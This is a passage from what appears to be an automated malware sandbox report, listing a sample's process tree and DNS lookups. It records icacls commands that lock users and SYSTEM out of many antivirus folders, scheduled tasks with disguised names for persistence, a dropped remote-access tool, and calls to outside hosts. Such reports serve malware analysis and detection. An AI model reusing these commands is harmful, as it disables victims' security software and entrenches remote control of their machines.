                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                            icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                            PID:1784
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:1600
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                              icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                              PID:348
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:2868
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                PID:2032
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:2636
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                  icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                  PID:2464
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:2856
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                    PID:1264
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:2864
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                      PID:2020
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:776
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:3020
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:2272
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                          icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                          PID:2492
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:280
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                            PID:2304
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:1160
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                              icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:2192
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:448
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                PID:1008
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:2600
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                  icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:624
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:3044
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                    PID:1268
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:944
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                      PID:1868
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:2996
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                        PID:2216
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:976
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                          icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                          PID:2780
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:2736
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                            icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                            PID:2772
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:2380
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                              PID:2252
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:2180
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                PID:2888
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:2532
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                  icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                  PID:2036
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:868
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                    PID:1596
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:396
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                      PID:1500
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:572
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                        icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                                        PID:1824
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                          icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                          PID:1268
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:1208
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                            icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                            PID:2820
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:1620
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                              icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                              PID:2380
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:588
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                PID:1312
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:2632
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                  PID:2008
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                PID:3052
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                PID:2920
                                                                                                                                                                                                                                                                                            • C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                              C:\ProgramData\Windows\rutserv.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                              PID:2292
                                                                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                PID:1448
                                                                                                                                                                                                                                                                                                • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                  C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                  PID:1712
                                                                                                                                                                                                                                                                                              • C:\ProgramData\Windows\rfusclient.exe
                                                                                                                                                                                                                                                                                                C:\ProgramData\Windows\rfusclient.exe /tray
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                PID:1760
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-1378315616-2099129716-6861258891895924701207930003-431512127-453814991110130509"
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:1712
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-99689796-566043216-887936256-107505253117774716923038445291232024347-1717058599"
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:2796
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "733860415-10754459625520773341654976250-894836520-18021974595438273741778210946"
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:1940
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "375200677-318733482-77533795-353067904-1788968353-5275183914002899522029157451"
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:2280
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-96957096415168028481329593629-12178841851274472923687401490516098155-1693898531"
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:2880
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "10729527991868988543367256462-1499366575-198847238-1652290533-1123537360649711405"
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:2568
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "-2189247021918113904548864968-8523274011729232169451085392-1367386886-1069267558"
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:1752
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:2720
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "-1144136710-1820675159-159359249-8579595701297657963-299432308-274728683565946449"
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:2512
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-42357209120440678616412854572010780104-1912517985-1106344870783833714-1941866001"
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:2892
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "1342570828112605396-839183993-416786961-1875688096-15014693411472492710-789692927"
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:1664
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "1502824279781873718-1234526365-10122925052025586175-11081045301847066258-1948367591"
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:1648
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-412200360-1090013430424511592-4978965-2058375134-1172454658-1238406623-1062953145"
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:1088
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe "1218225790-827050601-929138903103126774133267602715214895201063325128208281529"
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:2468
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "674573242-100061850720986783761262821907782622471-1471637688-11128388521493049632"
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:776
                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe "1012036909-296099594-1273604466-14253937531843526586-82998418115828324371611826522"
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:2876
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "288939988-1434297353-1937656987-4980586619298303781860614252-665415665-124621692"
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:2252
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "-55304701-5244029101618296281-321118497-300742868687609511-139161804119975478"
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:2052
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "-1048966535354923795-1651090685-1213588183-1932079574462580858-1289852144-1091911510"
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:1792
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe "18372401941702227554-597061436-736511270-19364243132747698985647355791887393252"
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:2020
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe "-43425478-395172572-7946073009119572368258078571691667580323165898-597303036"
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:1924
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                                                                                                                                                                                                                                                        taskeng.exe {6DF49482-3EF5-47B1-895D-D6F296853E95} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:2192
                                                                                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                            PID:2752
                                                                                                                                                                                                                                                                                                                                          • C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                            C:\Programdata\RealtekHD\taskhostw.exe
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                            PID:2364

                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          rms-server.tektonit.ru
                                                                                                                                                                                                                                                                                                                                          rutserv.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          rms-server.tektonit.ru
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          rms-server.tektonit.ru
                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                          main.internetid.ru
                                                                                                                                                                                                                                                                                                                                          main.internetid.ru
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          95.213.205.83
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          boglogov.site
                                                                                                                                                                                                                                                                                                                                          ink.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          boglogov.site
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          boglogov.site
